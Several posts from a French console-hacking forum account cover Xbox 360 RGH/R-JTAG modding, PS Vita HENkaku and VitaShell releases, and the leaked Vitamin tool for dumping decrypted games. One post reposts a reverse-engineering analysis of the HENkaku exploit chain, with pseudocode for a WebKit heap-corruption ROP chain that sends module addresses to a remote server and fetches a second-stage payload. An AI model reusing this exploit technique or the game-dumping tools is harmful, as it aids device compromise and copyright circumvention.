deaphroat

Membres
  • Compteur de contenus

    6 848
  • Inscription

  • Dernière visite

Messages posté(e)s par deaphroat

  1. allez au pire je veux bien un xkey... mais le flash en 2016... regarde les odde au pire il restera compatible dans une autre si la console crame (xenon qui fait tourner cod 6 installé dans le DD avec pack hd oblige sur une console en vga ca va mouliner tout ca :) )...

    ... une puce si tu prend du rjtag tu aura peut etre du mal a la remonté dans une autre console (slim...)

  2. salut

    opus = falcon sans hdmi

    - le flash tu oublie

    - et je te dirais bien la xenon tu l'oublie aussi elle va lacher dans un mois :)-

    - depuis 15xxx il y a plus que le rgh2 plus le rgh1

    - il y a peut etre le rgh 1.2 qui marche...

    sinon ben oui tente le r jtag y a que ca qui doit marcher sur xenon...

    pour le RGH RJTAG faut un lecteur SPI, un flasheur de puce dans certains cas...

    une puce dedié pour le r jtag différente des puces RGH....

  3. Comme vous le savez, la semaine dernière, YifanLU annonçait HENKaku, un "Homebrew Enabler" pour Ps Vita en 3.60.

    Henkaku_local.jpg


    Nouveautés/corrections :

    [ 4 ]
    - Corrections d'erreurs avec le site Youtube
    - Support du stockage interne pour les PsTv et Vita Slim
    - Mise à jour de VitaShell en 0.86

    [ 3 ]
    - Spoof Psn, pour accéder au Psn sans mettre à jour en 3.61, se renseigner sur les homebrews utilisés s'ils sont codés de manière Safe pour le live..
    - Mise à jour de VitaShell en 0.80
    - Corrections d'erreurs visuels
    - Mise à jour bloquée, en mode HENkaku, la mise à jour par les serveurs officiels est bloquée

    [ 2 ]
    - Support de Dynarec
    - Installation offline
    - Mise à jour de VitaShell en 0.7, abandon de molecularShell

    [ 1 ]
    - Release initial


    download.png henkaku

    homesite.png Source : wololo.net

  4. Le développeur TheFl0W a mit à jour le VitaShell, le rendant compatible avec les Vita en 3.60 HENKaku et en ajoutant plus d'options au passages.

    vitashell091.jpg


    VitaShell est un gestionnaire de fichiers et un serveur FTP pour Vita, il peut donc remplacer molecularShell dans HENKaku.


    Nouveautés/corrections :

    [ 0.91 ]
    - Mise à jour réseau automatique de VitaShell et de molecularShell, une notification apparaîtra lors d'une mise à jour possible
    - Ajout des icônes texte et musique (merci à littlebalup)
    - Mise à jour avec la dernière version de libftpvita pour corriger les erreurs de tailles pour les fichiers de plus de 2 go et ajouter des commandes APPE

    [ 0.90 ]
    - Possibilité d'utiliser un fond d’écran différent pour l’explorateur, l'éditeur hexadécimal, l’éditeur de texte et le visualiseur de photo
    - Ajout d’icône pour les fichiers et les dossiers (merci à littlebalup)
    - Ajout de l’icône de charge batterie (merci à ribbid987)
    - Ajout d'un lecteur SFO (merci à theorywrong)
    - Ajout de la traduction Turk (la langue utilise la même ID que la langue Turk, erreur de Sony)
    - Correction d'erreurs avec le presse papier
    - Possibilité d’éteindre automatiquement l’écran, mode économie d'énergie
    - Combo d'affichage des informations système modifié de L+R+START au lieu de START

    [ 0.86 ]
    - Ajout d'une animation des boites de dialogue et alignement pour améliorer le visuel
    - Corrections d'erreurs de Timer (merci à persona5)
    - Corrections de bug du texte INSTALL_WARNING
    - Ajout de la création de fichier par défaut


    download.png VitaShell

    homesite.png Source : wololo.net

  5. Depuis quelques semaines, quelques jeux commerciaux commencent à pouvoir être lancés sur Ps Vita via HENkaku.

    vitamin_ps_vita_dump_plugin.jpg

    Adventure time a été le premier jeu sorti, mais il a été confirmé que c'était un leak d'un développeur d'un jeu sans DRM et que donc aucune méthode de bypass n'a été utilisé. Tokyo Xanadu, le second jeu, n'a pas encore eu ses sources d'identifiées, certain avancent un leak d'une entreprise chinoise chargée des traductions...

    Wololo après investigation auprès de ses contacts a eu des preuves de l'existence de jeux au format compatible avec HENkaku.

    Peu de temps après ça, la team FreeK, a montré un POC de Vitamin, un outil pour dumper une version décryptée de ses jeux Vita, depuis, la team aurait sortie le jeu the binding of Isaac.

    Une autre team, celle qui a probablement sortie Tokyo Xanadu et Odin Sphere la semaine dernière, aurait quand à elle sortie Hotaru no Nikki. Les fans n'ont mis que quelques heures pour le traduire en version anglaise.

    Les choses se sont enchaînées par la suite. un groupe d'individus a leaké Team FreeKs Vitamin, l'outil de la team FreeK.

    Ce qui a entraîné, via Twitter, quelques révélations par le groupe de développeur. TheFloW est en réalité la team FreeK, et la team FreeK est en réalité Mr Gas et Major_Tom. Ce leak, venant probablement des testeurs de la team, est une version bêta, il manque les dernières fonctions implantées par la team.

    Suite à ça, Mr Gas a décidé de quitter la scène. Ce développeur est à l'origine de quelques hacks dans le monde Vita, il a participé au développement du bubble trick, ou a quelques ports du VHBL sous un autre pseudo TomTomDu80. Son départ n'est cependant pas définitive, il pourrait revenir sous un autre pseudo peut être...

    Major_Tom, quand à lui, a décider en premier lieu de ne pas sortir la version finale de leurs travaux, mais après une nuit de réflexion, il nous présente sa version de Vitamin.

    Nouveautés/corrections :

    [ 1.1 ]

    - Ajout du Dump des cartouches de jeux avec grw0:

    - Ajout d'une restauration de fichier en cas de dump corrompus (corrige l'erreur 0x80010011)

    [ 1 ]

    - Release officielle par Major_Tom

    [ Release non officielle ]

    Le forum Gueux est avant tout un site informatif, à ce titre, on se doit de parler de ce logiciel, mais par soucis de droit d'auteur aucun lien du programme sera fourni ici.

    Merci à leeloyd pour l'information.

    homesite.png wololo.net

  6. euh...je l'ai simplement déplacée,sa news, depuis la section des propal, raison pour laquelle il ne pouvait pas l'éditer (pas de droit en réécriture)

    c'est un peu comme ça que ça marche depuis....à peu près toujours....

    ha ok pck déjà la semaine dernier jai du reccrire un de ses article qui etait en news psp et que je ne savais déjà pas comment elle etais arrivé la...

    en faite on a JAMAIS déplacé de propal.... on remerciait la bas et on recrivais la news... la c'est absent de propal on le sait plus...

  7. salut all

    Bon si y a des fautes ou erreurs MP :)

    Sinon un Talk d'un participant de chez Wololo à propos du reverse :

    Stage 1 (browser exploit):

    Visiting http://henkaku.me and pressing the “Install” button results in a server side useragent check.

    If the browser’s useragent matches the one of a PS Vita/PSTV on the latest firmware version (3.60), the user is redirected to http://go.henkaku.me and an exploit is deployed.

    This exploit re-uses elements from the older public exploits (heap spraying method, sort() bug, scrollLeft attribute manipulation) and pairs them with a new heap corruption technique.

    Team molecule renamed variables and methods to provide a simple obfuscation layer on the HTML code.

    You can find the partially reversed code (focusing on the most crucial portions) here: http://pastebin.com/bYA4xGaQ

    Similarly to older exploits, this allows to corrupt an object’s vtable and achieve ROP inside the SceWebkit module.

    Offsets for libraries and relevant ROP gadgets are fetched from a javascript file (http://go.henkaku.me/payload.js) during the last stage of the exploit.

    Team molecule implemented a dynamic method to relocate gadgets and functions’ offsets for each module after their base addresses’ are found (by looking at SceWebkit’s import stubs).

    Stage 2 (ROP payload 1):

    At this stage, the browser exploit has layed out the memory space to start the first ROP payload which is reconstructed from the payload.js file.

    The payload.js file contains two arrays, one containing the payload’s binary data and another containing the relocation type for each word.

    By crossing this information the exploit reads the payload and relocates all code offsets to their target module’s address space by adding the module’s base address to them:

    Relocation type 0 -> Plain data stored inside the ROP space itself. No relocation needed.

    Relocation type 1 -> Offset inside the ROP payload's stack.

    Relocation type 2 -> Offset inside the SceWebkit module.

    Relocation type 3 -> Offset inside the SceLibKernel module.

    Relocation type 4 -> Offset inside the SceLibc module.

    Relocation type 5 -> Offset inside the SceLibHttp module.

    Relocation type 6 -> Offset inside the SceNet(?) module.

    Relocation type 7 -> Offset inside the SceDriverUser(?) module.

    The reconstructed payload can be find here: https://www.sendspace.com/file/mwpeut

    And an analysis of the payload’s binary data can be found here: http://pastebin.com/gxc0cX1i

    This payload is responsible for taking care of a few things like:

    // Do stuff

    ...

    // Create a new thread for the second payload

    int thread_id = sceKernelCreateThread("st2", SceWebkit_base + 0x000054C8, 0x10000100, 0x00600000, 0x00000000, 0x00000000, 0x00000000);

    // Do stuff

    ...

    // Construct the arguments for fetching the second payload

    strcpy(stack_base + 0x000000BC, "http://go.henkaku.me/x");

    snprintf(stack_base + 0x000002C4, 0x00000100, "?a1=%x", stack_base);

    strcpy(stack_base + 0x000000BC, stack_base + 0x000002C4);

    snprintf(stack_base + 0x000002C4, 0x00000100, "&a2=%x&a3=%x&a4=%x&", SceWebkit_base, SceLibKernel_base, SceLibc_base);

    strcpy(stack_base + 0x000000BC, stack_base + 0x000002C4);

    snprintf(stack_base + 0x000002C4, 0x00000100, "&a5=%x&a6=%x&a7=%x&", SceLibHttp_base, SceNet_base, SceDriverUser_base);

    strcpy(stack_base + 0x000000BC, stack_base + 0x000002C4);

    // Do stuff

    ...

    // Send HTTP requests to fetch the second payload

    SceLibHttp_92fd(0x00010000);

    int http_buf = SceLibHttp_947b("ldr", 0x00000002, 0x00000001);

    SceLibHttp_950b(http_buf, stack_base + 0x000000BC, 0x00000000);

    int http_req = SceLibHttp_95ff(http_buf, 0x00000000, stack_base + 0x000000BC);

    SceLibHttp_9935(http_req, 0x00000000, 0x00000000);

    SceLibHttp_9983(http_req);

    // Do stuff

    ...

    After the first payload is done, an HTTP request is sent to the server using the following template:

    http://go.henkaku.me/x?a1=stack_base&a2=webkit_base&a3=libkernel_base&a4=libc_base&&a5=libhttp_base&a6=net_base&a7=driveruser_base&

    Example:

    http://go.henkaku.me/x?a1=89f02000&a2=81b009a0&a3=e000dd00&a4=811c0cc0&&a5=e0607c80&a6=e01302b0&a7=e0047bf0&

    The “x” script on the server side collects the base addresses for each module and generates a second payload to be run on the Vita.

    Stage 3 (ROP payload 2):

    The second payload is composed by another ROP chain and obfuscated ARM code.

    A preliminary analysis of this payload reveals a few interesting things:

    strcpy(stack_base + 0x000086B4, "sdstor0:");

    strcpy(stack_base + 0x000086CC, "xmc-lp-ign-userext");

    // Do stuff

    ...

    strcpy(stack_base + 0x000086E4, "molecule0:");

    SceLibKernel_a4ad("molecule0:");

    SceLibKernel_a55d("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014);

    // Do stuff

    ...

    int thread1_id = sceKernelCreateThread("pln", SceWebkit_base + 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x000003FF, 0x00000000);

    SceLibKernel_a791(thread1_id, 0x7C);

    // Do stuff

    ...

    int thread2_id = sceKernelCreateThread("mhm", SceWebkit_base + 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000);

    // Do stuff

    ...

    SceNet_27E1("x", 0x00000002, 0x00000001);

    SceNet_27E1("x", 0x00000002, 0x00000001);

    SceNet_27E1("x", 0x00000002, 0x00000001);

    SceNet_27E1("x", 0x00000002, 0x00000001);

    SceNet_27E1("x", 0x00000002, 0x00000001);

    // Do stuff

    ...

    SceNet_27E1("sss", 0x00000002, 0x00000001);

    SceNet_27E1("tst", 0x00000002, 0x00000007);

    SceNet_27E1("tmp", 0x00000002, 0x00000001);

    // Do stuff

    ...

    To be continued…

    ~ H.

  8. En même temps tout ce qui est arrivé a Sony, c'est à cause de la faille webkit du navigateur qu'il on fourni, La ps3 fut a moiter cracké a cause de asbestOs et sur Ps4/Vita du navigateur fourni.

    Il doivent s'en mordre les doigt quand meme, de son coté crosoft fait certainement une console plus fermé donc moins open sowftarement...